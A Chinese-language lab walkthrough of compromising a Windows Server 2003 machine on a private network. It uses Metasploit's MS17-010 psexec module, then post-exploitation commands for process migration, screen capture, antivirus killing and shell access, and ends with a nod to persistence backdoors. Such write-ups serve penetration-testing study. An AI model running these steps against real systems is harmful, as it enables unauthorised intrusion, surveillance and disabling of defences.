概要
本篇文章记录使用metasploit利用Windows的ms17_010_pesexec
远程控制漏洞攻击Windows Server 2003 Standard x64 Edition
获取shell权限的过程
psexec
PsExec 是来自 Microsoft 的多功能系统管理工具,您可以使用它来远程访问目标主机。 该实用工具是 Mark Russinovich 创建的 Sysinternals 套件的一部分。 其主要目的是帮助系统管理员在目标主机上执行远程维护任务和执行命令。
实战过程
机器环境:
攻击机器:kali Linux 2023
被攻击机器:Windows Server 2003 Standard x64 Edition
第一步:信息收集
使用nmap对192.168.64网络环境进行版本探测扫描:
nmap -sV 192.168.64.1-200
扫描结果:
可以发现在该局域网下有一台192.168.64.131的机器存活,通过观察可以发现目标机器的操作系统是Windows_server_2003,并且开放了445号端口
第二部:漏洞利用
接下来,我们打开metasploit,进行针对445端口的漏洞利用。
我们键入以下命令开启工具:
msfconsole
界面如图所示:
进入到主界面metasploit之后我们使用如下命令来扫描ms17_010漏洞利用模块:
search ms17_010
执行效果:
执行之后我们发现了exploit/windows/smb/ms17_010_psexec漏洞利用模块,本次我们采用该漏洞利用模块对目标机器进行攻击。
使用exploit/windows/smb/ms17_010_psexec漏洞利用模块:
use exploit/windows/smb/ms17_010_psexec
执行效果:
成功使用了该模块之后我们来查看一下配置信息:
键入:
show options
执行效果:
可以看到我们此时需要配置目标主机的IP地址,这时我们使用set
命令来执行,如图所示:
- 成功配置之后,我们可以再次键入
show options
命令检查我们配置的信息
接下来我们使用run或exploit
来执行攻击命令,如图所示:
可以看到,成功执行命令之后,系统会返回一个meterpreter的shell,这时代表我们已经攻击成功了!之后,我们就可以键入一些基本命令看看攻击效果:
使用ps
命令来查看当前被攻击机器上正在运行的进程:
使用getpid
命令来查看当前meterpreter shell的进程号:
使用以下命令完成一次自动的进程迁移:
run post/windows/manage/migrate
效果如图:
可以发现我们由原来的pid:3044迁移到了pid:1752,使用进程迁移可以使得我们的meterpreter shell 进程更加稳定。
使用这个命令可以远程对目标进行屏幕捕获:
screenshot
此时图片被存放到路径:/home/kali下的一个名为myarpngV.jpeg的图片文件
效果如图所示:
可以看到,当前的目标被攻击机器正处于休眠状态
使用如下命令关闭杀毒软件:
run post/windows/manage.killav
效果如图所示:
由于当前主机没有该进程,所以显示了“找不到目标进程”
最后再记录一个命令shell
,这个命令可以直接进入到目标的shell,效果如图所示:
以上就是一次记录通过ms17_010_psexec远程控制漏洞入侵Windows server 2003的一次操作。
在成功攻击目标之后,我们还可以进入到后渗透阶段,通过权限提升,纵向提权、横线提权等操作来扩大作战规模,通过种植后门来进行一个权限维持的操作…
OK啊,本次就暂时记录这么多,由于能力有限,许多的技术细节以及技巧没有能够表达出来。还请阅读本文章的读者敬请谅解!